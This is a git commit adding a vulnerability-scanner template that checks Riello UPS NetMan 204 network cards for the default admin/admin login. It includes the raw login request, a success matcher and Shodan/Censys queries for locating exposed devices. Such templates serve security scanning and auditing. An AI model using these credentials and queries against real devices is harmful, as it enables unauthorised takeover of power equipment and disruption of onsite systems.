Add Netman Default Login

Add a template for default login on Riello UPS NetMan 204. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems.
This commit is contained in:
Muhammad Abdullah
2023-06-12 15:12:48 +05:00
parent f82fa792a1
commit 965aaf89ff
2 changed files with 56 additions and 0 deletions

View File

@@ -1378,6 +1378,16 @@
"website": "https://the-empire.systems",
"email": ""
}
},
{
"author": "mabdullah22",
"links": {
"github": "https://www.github.com/maabdullah22",
"twitter": "https://twitter.com/0x416264",
"linkedin": "",
"website": "",
"email": ""
}
}
]

View File

@@ -0,0 +1,46 @@
id: Netman204-default-login
info:
name: Riello UPS NetMan 204 Network Card - Default Login
author: mabdullah22
severity: high
description: Default logins on Riello UPS NetMan 204 is used. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems.
reference:
- https://www.riello-ups.com/
metadata:
verified: true
shodan-query: title:"Netman"
censys-query: services.http.response.body:"Netman204"
tags: default-login,Netman-204-login
requests:
- raw:
- |
GET /cgi-bin/login.cgi?username={{username}}&password={{password}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"response": "ok",'
- '"message": "Welcome."'
condition: and
- type: status
status:
- 200